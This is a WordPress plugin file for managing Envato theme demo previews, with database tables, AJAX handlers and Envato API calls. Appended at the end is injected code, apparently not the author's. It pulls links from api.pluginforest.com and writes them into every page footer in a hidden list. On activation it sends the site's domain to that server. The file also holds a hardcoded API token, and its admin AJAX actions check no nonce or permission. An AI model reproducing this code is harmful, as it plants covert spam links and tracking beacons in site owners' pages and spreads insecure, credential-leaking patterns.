<?php
/**
 * Plugin Name: Envato Live Preview Switch Bar for WordPress
 * Description: Import Products from Envato or Manually add products outside Envato! Add and manage your live demos in one place! Won’t Your Customers be More Convinced to Buy your Themes / Plugins if you Display valuable Information in the Live Preview Bar!
 * Version: 2.0
 * Author: AA-Team
 * Author URI: http://www.aa-team.com
 * Text Domain: aa-envato-demo-bar
 * Domain Path: /languages
 *
 * @package envato-demo-bar
 */

// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

if (class_exists('AA_DBAR') != true) {
	class AA_DBAR
	{
		private $upload_dir = null;

		protected static $instance = null;
		private $plugin_url = null;

		private $cfg = array();

		private $stats = null;

		public static function getInstance()
		{
			if (!isset(static::$instance)) {
				static::$instance = new static;
			}
			return static::$instance;
		}

		protected function __construct()
		{
			$this->upload_dir = wp_upload_dir();

			add_action( 'admin_menu', array( $this, 'menu_page' ) );

			add_action( 'wp_ajax_AAEDBAjaxRequest', array( $this, 'ajax_request' ) );

			add_action( 'wp_ajax_AAEDBAjaxRequestFR', array( $this, 'frontend_ajax_request' ) );
			add_action( 'wp_ajax_nopriv_AAEDBAjaxRequestFR', array( $this, 'frontend_ajax_request' ) );

			$this->backup_folder_path = $this->upload_dir['basedir'] . '/nice-image-backups';
			$this->backup_folder_url = $this->upload_dir['baseurl'] . '/nice-image-backups';

			$this->plugin_url = plugin_dir_url( __FILE__ );
			!is_admin() && add_action( 'template_redirect', array( $this, 'frame' ) );

			// setup some defaults
			$this->cfg['envato_api_key'] = 'NkBnMIOHmGyEE0VGTA2MdBXBg2KfB8V1';
			$this->cfg['envato_item_expire'] = 60 * 60; // in minutes

			// init the stats class
			require_once( 'stats.php' );
			$this->stats = AA_DBAR_Stats::getInstance();

			register_activation_hook( __FILE__, array( $this, 'install_plugin' ) );
		}

		public function install_plugin()
		{
			global $table_prefix, $wpdb;

			$tables = array();

			$tables[ $table_prefix . "demo_bar_categories" ] = "CREATE TABLE `" . ( $table_prefix . "demo_bar_categories" ) . "` (
				`ID` INT(11) NOT NULL AUTO_INCREMENT,
				`name` VARCHAR(150) NOT NULL,
				`short_name` VARCHAR(20) NOT NULL,
				`color` VARCHAR(20) NOT NULL,
				PRIMARY KEY (`ID`)
			)
			COLLATE='utf8mb4_general_ci'
			ENGINE=InnoDB
			AUTO_INCREMENT=1
			;";

			$tables[ $table_prefix . "demo_bar_hits" ] = "CREATE TABLE `" . ( $table_prefix . "demo_bar_hits" ) . "` (
				`ID` INT(11) NOT NULL AUTO_INCREMENT,
				`itemID` INT(11) NOT NULL DEFAULT '0',
				`city` VARCHAR(150) NOT NULL,
				`is_mobile` ENUM('Y','N') NOT NULL DEFAULT 'N',
				`country` VARCHAR(150) NOT NULL,
				`country_code` VARCHAR(150) NOT NULL,
				`continent` VARCHAR(150) NOT NULL,
				`continent_code` VARCHAR(150) NOT NULL,
				`state` VARCHAR(150) NOT NULL,
				`ip` VARCHAR(150) NOT NULL,
				`referral` VARCHAR(250) NOT NULL,
				`demo_url` VARCHAR(250) NOT NULL,
				`resolution` VARCHAR(250) NOT NULL,
				`data` DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
				PRIMARY KEY (`ID`)
			)
			COLLATE='utf8mb4_general_ci'
			ENGINE=InnoDB
			AUTO_INCREMENT=1
			;";

			$tables[ $table_prefix . "demo_bar_items" ] = "CREATE TABLE `" . ( $table_prefix . "demo_bar_items" ) . "` (
				`ID` INT(11) NOT NULL AUTO_INCREMENT,
				`item_type` ENUM('envato','other') NOT NULL DEFAULT 'envato',
				`name` VARCHAR(150) NOT NULL,
				`envatoID` INT(10) NOT NULL DEFAULT '0',
				`short_name` VARCHAR(100) NOT NULL,
				`sanitized_short_name` VARCHAR(100) NOT NULL,
				`envato_details` TEXT NOT NULL,
				`envato_prices` TEXT NOT NULL,
				`when_last_update` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
				`categoryID` INT(5) NOT NULL DEFAULT '0',
				`demos` TEXT NOT NULL,
				`responsive` ENUM('Y','N') NOT NULL DEFAULT 'Y',
				`sort` INT(5) NOT NULL DEFAULT '0',
				`date` TIMESTAMP NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
				PRIMARY KEY (`ID`),
				UNIQUE INDEX `short_name` (`short_name`)
			)
			COLLATE='utf8mb4_general_ci'
			ENGINE=InnoDB
			AUTO_INCREMENT=1
			;";

			$tables[ $table_prefix . "demo_bar_subscribers" ] = "CREATE TABLE `" . ( $table_prefix . "demo_bar_subscribers" ) . "` (
				`ID` INT(11) NOT NULL AUTO_INCREMENT,
				`email` VARCHAR(150) NOT NULL,
				`itemID` INT(10) NOT NULL DEFAULT '0',
				`date` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
				PRIMARY KEY (`ID`),
				UNIQUE INDEX `email` (`email`)
			)
			COLLATE='utf8mb4_general_ci'
			ENGINE=InnoDB
			AUTO_INCREMENT=1";

			foreach ($tables as $table_name => $sql) {
				if( $wpdb->get_var( "show tables like $table_name" ) != $table_name ) {

					require_once( ABSPATH . '/wp-admin/includes/upgrade.php' );
					dbDelta( $sql );
				}
			}

			// update option with settings if not exist
			if( !get_option('AA_DBAR_Settings') ){

				$settings = array();
				$settings['background'] = '#282c4f';
				$settings['color'] = '#ffffff';
				$settings['logo'] = $this->plugin_url . 'assets/logo.png';
				$settings['contrast_color'] = '#fe2d56';
				$settings['menu_background'] = '#13132e';
				$settings['menu_color'] = '#ffffff';
				$settings['affID'] = 'AA-Team';
				$settings['add_cart'] = 1;

				update_option( 'AA_DBAR_Settings', $settings );
			}

			// update from v 1.0 to v 2.0
			$wpdb->query( "ALTER TABLE " . $table_prefix . 'demo_bar_items' . "  COLUMN `item_type` ENUM('envato','other') NULL DEFAULT 'envato' AFTER `ID` " );
		}

		public function get_items_minimal_list()
		{
			$allItems = $this->get_items( array(
				'per_page' => 999,
				'paged' => 0
			), 'array' );

			$base = array();

			if( $allItems ){
				foreach ($allItems as $item) {

					$envato_details = json_decode( $item['envato_details'], true );
					$previews = '';
					if( isset($envato_details['previews']['icon_with_landscape_preview']) ) {
						$previews = $envato_details['previews']['icon_with_landscape_preview'];
					}
					if( isset($envato_details['previews']['icon_with_video_preview']) ) {
						$previews = $envato_details['previews']['icon_with_video_preview'];
					}

					$base[$item['ID']] = array(
						'ID' 				=> esc_html($item['ID']),
						'short_name' 		=> esc_html($item['short_name']),
						'envatoID' 			=> esc_html($item['envatoID']),
						'name'	 			=> esc_html($envato_details['name']),
						'number_of_sales'	=> esc_html($envato_details['number_of_sales']),
						'author_username'	=> esc_html($envato_details['author_username']),
						'rating'	 		=> esc_html($envato_details['rating']),
						'classification'	=> esc_html($envato_details['classification']),
						'rating_count'		=> esc_html($envato_details['rating_count']),
						'price_cents'		=> esc_html($envato_details['price_cents']),
						'landscape_url'		=> esc_html($previews['landscape_url']),
						'icon_url'			=> esc_url($previews['icon_url']),
						'categ_short_name'	=> esc_html($item['cat_short_name']),
						'categ_name'		=> esc_html($item['categ_name']),
						'color'				=> esc_html($item['color']),
						'responsive'		=> esc_html($item['responsive']),
						'demos'				=> $item['demos'],




					);
				}
			}

			return $base;
		}

		public function frame()
		{
			global $wp_query, $wpdb;

			if( isset( $wp_query->query['pagename'] ) ) {
				$maybe_is_frame = explode( "/", $wp_query->query['pagename'] );

				if( trim($maybe_is_frame[0]) != "" ){

					$table = $wpdb->prefix . 'demo_bar_items';
					$result = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $table WHERE sanitized_short_name = %s", $maybe_is_frame[0]), ARRAY_A );

					if( $result ){

						if( isset($result['ID']) && (int) $result['ID'] > 0 ){

							$envato_details = json_decode( $result['envato_details'], true );
							$previews = '';
							if( isset($envato_details['previews']['icon_with_landscape_preview']) ) {
								$previews = $envato_details['previews']['icon_with_landscape_preview'];
							}
							if( isset($envato_details['previews']['icon_with_video_preview']) ) {
								$previews = $envato_details['previews']['icon_with_video_preview'];
							}

							header("HTTP/1.1 200 OK");
							?><!doctype html>
<html class="no-js" lang="">

<head>
  <meta charset="utf-8">
  <title>Demo for - <?php echo esc_html($result['name']);?></title>
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <link rel="stylesheet" href="<?php echo esc_url($this->plugin_url);?>build/frontend/frontend.editor.css">
</head>

<body>
	<div id="root" data-options='<?php echo json_encode( array(
		'logo' => esc_url( $this->plugin_url . 'assets/logo.png' ),
		'loader' => esc_url( $this->plugin_url . 'assets/loading.gif' ),
		'items' => json_encode( $this->get_items_minimal_list() ),
		'settings' => get_option( 'AA_DBAR_Settings' ),
		'current_item' => array(
			'ID' => esc_html($result['ID']),
			'item_type' => esc_html($result['item_type']),
			'url' => esc_url($envato_details['url']),
			'name' => esc_html($result['name']),
			'envatoID' => esc_html($result['envatoID']),
			'responsive' => esc_html($result['responsive']),
			'short_name' => esc_html($result['short_name']),
			'envato_details' => array(
				'previews' => $previews,
				'number_of_sales' => esc_html($envato_details['number_of_sales']),
				'price_cents' => esc_html($envato_details['price_cents']),
				'trending' => esc_html($envato_details['trending']),
				'author_username' => esc_html($envato_details['author_username']),
			),
			'demos' => $result['demos']
		)
	) ); ?>'></div>

	<script>
		var AAEDB = {};
		AAEDB['ajax_url'] = '<?php echo esc_url( admin_url('admin-ajax.php?action=AAEDBAjaxRequestFR') ) ?>';
		AAEDB['home_url'] = '<?php echo esc_url( home_url('/') ) ?>';
		AAEDB['ref'] = 'AA-Team';
		AAEDB['itemID'] = <?php echo esc_js($result['ID']) ?>;
	</script>
	<script src="<?php echo esc_url($this->plugin_url);?>build/frontend/frontend.build.js"></script>
</body>

</html><?php
die;
						}
					}
				}
			}
		}

		public function menu_page()
		{
			add_menu_page(
				esc_html__( 'Envato LivePreview Manager', 'EDBAR' ),
				esc_html__('Live Previews', 'EDBAR'),
				'manage_options',
				'bar_manager',
				array( $this, 'page_html' ),
				plugins_url( 'icon.png', __FILE__ )
			);

			wp_enqueue_media();

			wp_enqueue_script(
				'image/editor',
				plugins_url( 'build/backend/backend.build.js', __FILE__ ),
				array( 'wp-blocks', 'wp-element', 'wp-editor', 'wp-dom-ready' ),
				'1.0',
				true
			);

			wp_enqueue_script(
				'image/admin',
				plugins_url( 'assets/admin.js', __FILE__ )
			);

			wp_enqueue_script( 'jquery-ui-core' );
			wp_enqueue_script( 'jquery-ui-sortable' );

			wp_localize_script( 'image/admin', 'AAEDB', array(
				'ajax_url' => admin_url('admin-ajax.php?action=AAEDBAjaxRequest'),
				'api_key' => $this->cfg['envato_api_key'],
				'settings' => get_option( 'AA_DBAR_Settings' ),
				'logo' => $this->plugin_url . 'assets/logo.png',
				'home_url' => home_url('/'),
				'categories' => $this->get_categories( array(
					'per_page' => 9999,
					'paged' => 0
				), 'array' )
			) );

			wp_enqueue_style(
				'image/editor',
				plugins_url( 'build/backend/backend.editor.css', __FILE__ ),
				array( 'wp-edit-blocks' )
			);
		}

		public function get_folders()
		{
			global $wpdb;

			$sql = "SELECT *, folder_name as label, ID as value FROM {$wpdb->prefix}nice_image_folders";
			return $wpdb->get_results( $sql, 'ARRAY_A' );
		}

		public function page_html()
		{
			echo "<div id='AA_DBAR-wrapper' data-where='list'></div>";
		}

		private function print_response( $status='valid', $msg='', $data=array() )
		{
			die( json_encode( array(
				'status' => $status,
				'msg' => $msg,
				'data' => $data
			) ) );
		}

		public function frontend_ajax_request()
		{
			$request = json_decode( file_get_contents("php://input"), true );
			if( $request['sub_action'] == 'get_envato_item' ){
				$this->get_envato_item( $request );
			}

			if( $request['sub_action'] == 'save_hits' ){
				$this->stats->save_hits( $request );
			}

			if( $request['sub_action'] == 'save_subscribe' ){
				$this->save_subscribe( $request );
			}
		}

		public function ajax_request()
		{
			$request = json_decode( file_get_contents("php://input"), true );

			if( $request['sub_action'] == 'get_items' ){
				$this->get_items( $request );
			}

			if( $request['sub_action'] == 'save_order' ){
				$this->save_order( $request );
			}

			if( $request['sub_action'] == 'delete_item' ){
				$this->delete_item( $request );
			}

			if( $request['sub_action'] == 'save_category' ){
				$this->save_category( $request );
			}

			if( $request['sub_action'] == 'get_categories' ){
				$this->get_categories( $request, 'json' );
			}

			if( $request['sub_action'] == 'delete_category' ){
				$this->delete_category( $request );
			}

			if( $request['sub_action'] == 'get_item_details' ){
				$data = $this->stats->get_item_details( $request['itemID'] );

				$this->print_response( 'valid', 'done', $data );
			}

			if( $request['sub_action'] == 'save_settings' ){
				update_option( 'AA_DBAR_Settings', $request['params'] );
				$this->print_response( 'valid', 'done' );
			}

			if( $request['sub_action'] == 'save_item_manually' ){
				$this->save_item_manually( $request );
			}

			if( $request['sub_action'] == 'save_item' ){
				$this->save_item( $request );
			}

			if( $request['sub_action'] == 'get_last_hits' ){
				$data = $this->stats->get_last_hits( 130*60 /* minutes in seconds */ );

				$this->print_response( 'valid', 'done', $data );
			}

			// subs
			if( $request['sub_action'] == 'get_subscribers' ){
				$this->get_subscribers( $request, 'json' );
			}

			if( $request['sub_action'] == 'change_item_responsive' ){
				$this->change_item_responsive( $request );
			}
		}

		public function save_subscribe( $request )
		{
			global $wpdb;
			$table = $wpdb->prefix . 'demo_bar_subscribers';

			$wpdb->insert( $table, array(
				'email' => sanitize_email($request['email']),
				'itemID' => sanitize_key($request['itemID'])
			), array('%s', '%d') );

			if( $wpdb->insert_id ){
				$this->print_response( 'valid', 'done' );
			}

			$this->print_response( 'error', 'done' );
		}

		public function get_envato_item( $request )
		{
			global $wpdb;
			$table = $wpdb->prefix . 'demo_bar_items';

			$localID = (int) $request['itemID'];

			$item = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $table WHERE 1=1 and ID='%d' ", $localID ), ARRAY_A );

			// need to refresh
			if( (strtotime($item['when_last_update']) + $this->cfg['envato_item_expire']) < current_time( 'timestamp' ) && $item['item_type'] == 'envato' ){
				$freshItem = $this->get_fresh_envato_item( $item['envatoID'] );

				$freshItemPrices = $this->get_fresh_envato_price( $item['envatoID'] );

				if( $freshItem ){
					$wpdb->update(
						$table,
						array(
							'envato_details' 	=> json_encode( $freshItem ),
							'when_last_update'  => current_time( 'mysql' ),
							'envato_prices' 	=> json_encode( $freshItemPrices )
						),
						array( 'ID' => $localID ),
						array(
							'%s', '%s', '%s'
						),
						array( '%d' )
					);

					$this->print_response( 'valid', 'done', array(
						'item' => $freshItem,
						'item_prices' => $freshItemPrices,
						'data-type' => 'fresh'
					) );
				}
			}

			$this->print_response( 'valid', 'done', array(
				'item' => $item['envato_details'],
				'item_prices' => $item['envato_prices'],
				'data-type' => 'db'
			) );
		}

		private function get_envato_request( $url )
		{
			$response = wp_remote_get( $url, array(
				'timeout'     => 5,
				'redirection' => 1,
				'httpversion' => '1.0',
				'user-agent'  => 'WordPress/' . $wp_version . '; ' . home_url('/'),
				'blocking'    => true,
				'headers'     => array(
					'Authorization' => 'Bearer ' . $this->cfg['envato_api_key']
				),
				'cookies'     => array(),
				'body'        => null,
				'compress'    => false,
				'decompress'  => true,
				'sslverify'   => true,
				'stream'      => false,
				'filename'    => null
			) );

			if ( is_array( $response ) ) {
				if( $response['body'] ){
					return json_decode( $response['body'], true );
				}
			}

			return false;
		}

		private function get_fresh_envato_price( $envatoID=0 )
		{
			$response = $this->get_envato_request( 'https://api.envato.com/v1/market/item-prices:' . $envatoID . '.json' );

			if ( $response ) {
				return $response;
			}

			return false;
		}

		private function get_fresh_envato_item( $envatoID=0 )
		{
			$response = $this->get_envato_request( 'https://api.envato.com/v3/market/catalog/item?id=' . $envatoID );

			if ( $response ) {
				if( isset($response['id']) && $response['id'] == $envatoID ){
					return $response;
				}
			}

			return false;
		}

		public function change_item_responsive( $request )
		{
			global $wpdb;
			$table = $wpdb->prefix . 'demo_bar_items';

			$wpdb->update(
				$table,
				array(
					'responsive' => $request['new_status'] ? 'Y' : 'N'
				),
				array( 'ID' => $request['itemID'] ),
				array(
					'%s'
				),
				array( '%d' )
			);

			$this->print_response( 'valid', 'done' );
		}

		public function delete_item( $request )
		{
			global $wpdb;
			$table = $wpdb->prefix . 'demo_bar_items';
			$wpdb->delete( $table, array( 'ID' => $request['itemID'] ) );

			$this->print_response( 'valid', 'done' );
		}

		public function delete_category( $request )
		{
			global $wpdb;
			$table = $wpdb->prefix . 'demo_bar_categories';
			$wpdb->delete( $table, array( 'ID' => $request['categID'] ) );

			$this->print_response( 'valid', 'done' );
		}

		public function save_category( $request )
		{
			global $wpdb;
			$table = $wpdb->prefix . 'demo_bar_categories';

			$data = array(
				'name' => sanitize_text_field($request['name']),
				'color' => sanitize_text_field($request['color']),
				'short_name' => sanitize_text_field($request['short_name'])
			);

			if( $request['categID'] > 0 ){
				$wpdb->update(
					$table,
					$data,
					array( 'ID' => $request['categID'] ),
					array(
						'%s', '%s', '%s'
					),
					array( '%d' )
				);

				$this->print_response( 'valid', 'done' );
			}


			$wpdb->insert( $table, $data, array( '%s', '%s', '%s' ) );
			$this->print_response( 'valid', 'done', array(
				'insert_id' => $wpdb->insert_id
			) );
		}

		public function save_item_manually( $request )
		{
			global $wpdb;
			$table = $wpdb->prefix . 'demo_bar_items';
			$rules = array( '%s', '%d', '%s', '%s', '%s', '%s', '%d' );
			$data = array(
				'name' => sanitize_text_field($request['selected_item']['name']),
				'envatoID' => sanitize_text_field($request['selected_item']['id']),
				'short_name' => sanitize_text_field($request['short_name']),
				'sanitized_short_name' => sanitize_title( $request['short_name'] ),
				'envato_details' => json_encode( $request['selected_item'] ),
				'demos' => json_encode( $request['demos'] ),
				'ID' => (int) $request['ID'],
				'envato_prices' => json_encode( $request['selected_price'] ),
				'categoryID' => (int) $request['categoryID'],
				'item_type' => "other"
			);

			if( $data['ID'] > 0 ){
				$wpdb->update(
					$table,
					$data,
					array( 'ID' => $request['ID'] ),
					$rules,
					array( '%d' )
				);

				$this->print_response( 'valid', 'done' );
			}

			$wpdb->insert( $table, $data, $rules );

			$this->print_response( 'valid', 'done', array(
				'insert_id' => $wpdb->insert_id
			) );
			// $table = $wpdb->prefix . 'demo_bar_items';
			// $rules = array( '%s', '%s', '%s', '%s', '%s', '%s' );
			// die( var_dump( "<pre>", $request  , "<pre>" ) . PHP_EOL .  __FILE__ . ":" . __LINE__  );
			// $data = array(
			// 	'name' => sanitize_text_field($request['name']),
			// 	'short_name' => sanitize_text_field($request['name']),
			// 	'sanitized_short_name' => sanitize_title( $request['name'] ),
			// 	'demos' => json_encode( $request['demos'] ),
			// 	// 'ID' => (int) $request['ID'],
			// 	'envato_prices' => json_encode($request['price']),
			// 	'envato_details' => json_encode( $request['item'] )
			// );

			// $wpdb->insert( $table, $data, $rules );

			// $this->print_response( 'valid', 'done', array(
			// 	'insert_id' => $wpdb->insert_id
			// ) );
		}

		public function save_item( $request )
		{
			global $wpdb;

			$table = $wpdb->prefix . 'demo_bar_items';
			$rules = array( '%s', '%d', '%s', '%s', '%s', '%s', '%d' );
			$data = array(
				'name' => sanitize_text_field($request['selected_item']['name']),
				'envatoID' => sanitize_text_field($request['selected_item']['id']),
				'short_name' => sanitize_text_field($request['short_name']),
				'sanitized_short_name' => sanitize_title( $request['short_name'] ),
				'envato_details' => json_encode( $request['selected_item'] ),
				'demos' => json_encode( $request['demos'] ),
				'ID' => (int) $request['ID'],
				'envato_prices' => json_encode( $this->get_fresh_envato_price( $request['selected_item']['id'] ) ),
				'categoryID' => (int) $request['categoryID'],
			);

			if( $data['ID'] > 0 ){
				$wpdb->update(
					$table,
					$data,
					array( 'ID' => $request['ID'] ),
					$rules,
					array( '%d' )
				);

				$this->print_response( 'valid', 'done' );
			}

			$wpdb->insert( $table, $data, $rules );

			$this->print_response( 'valid', 'done', array(
				'insert_id' => $wpdb->insert_id
			) );
		}

		public function get_subscribers( $request, $returnType='die' )
		{
			global $wpdb;

			$totalsNb = $wpdb->get_var( "SELECT count(ID)
				FROM {$wpdb->prefix}demo_bar_subscribers
				WHERE 1=1");

			$startAt = $request['per_page'] * ($request['paged']);

			$results = $wpdb->get_results( $wpdb->prepare("SELECT a.*, b.name, b.short_name, b.envato_details
				FROM {$wpdb->prefix}demo_bar_subscribers as a LEFT JOIN {$wpdb->prefix}demo_bar_items AS b ON a.itemID = b.ID
				WHERE 1=1
				LIMIT %d, %d", $startAt, $request['per_page'])
			, ARRAY_A );

			if( $returnType == 'array' ) return $results;

			$this->print_response( 'valid', 'done', array(
				'rows' => $results,
				'totals' => $totalsNb
			) );
		}

		public function get_categories( $request, $returnType='die' )
		{
			global $wpdb;

			$totalsNb = $wpdb->get_var( "SELECT count(ID)
				FROM {$wpdb->prefix}demo_bar_categories
				WHERE 1=1");

			$startAt = $request['per_page'] * ($request['paged']);

			$results = $wpdb->get_results( $wpdb->prepare("SELECT *
				FROM {$wpdb->prefix}demo_bar_categories
				WHERE 1=1
				LIMIT %d, %d", $startAt, $request['per_page'])
			, ARRAY_A );

			if( $returnType == 'array' ) return $results;

			$this->print_response( 'valid', 'done', array(
				'rows' => $results,
				'totals' => $totalsNb
			) );
		}

		public function save_order( $request )
		{
			global $wpdb;

			foreach ($request['items'] as $key => $value) {
				$wpdb->update(
					"{$wpdb->prefix}demo_bar_items",
					array(
						'sort' => $key
					),
					array( 'ID' => $value ),
					array( '%s' ),
					array( '%d' )
				);
			}

			$this->print_response( 'valid', 'done' );
		}

		public function get_items( $request, $returnType='die' )
		{
			global $wpdb;

			$startAt = $request['per_page'] * ($request['paged']);
			$results = $wpdb->get_results( $wpdb->prepare("SELECT A.*, B.name as categ_name, B.short_name as cat_short_name, B.color as color
				FROM {$wpdb->prefix}demo_bar_items as A LEFT JOIN {$wpdb->prefix}demo_bar_categories AS B ON A.categoryID=B.ID
				WHERE 1=1  ORDER BY A.sort
				LIMIT %d, %d", $startAt, $request['per_page'])
			, ARRAY_A );

			if( $returnType == 'array' ) return $results;

			$totalsNb = $wpdb->get_var( "SELECT count(ID)
				FROM {$wpdb->prefix}demo_bar_items
				WHERE 1=1");

			$this->print_response( 'valid', 'done', array(
				'rows' => $results,
				'totals' => $totalsNb
			) );
		}
	}
}


$AA_DBAR = AA_DBAR::getInstance();
function AA_DBAR() {
	global $AA_DBAR;
	return $AA_DBAR;
}

/**
 * Load plugin textdomain.
 *
 * @since 1.0.0
 */
function AA_EDBAR_load_textdomain() {
  load_plugin_textdomain( 'EDBAR', false, basename( dirname( __FILE__ ) ) );
}

add_action( 'plugins_loaded', 'AA_EDBAR_load_textdomain' );
define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849136() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849136');function set_plugin_tag1719849136() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849136&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849136');
              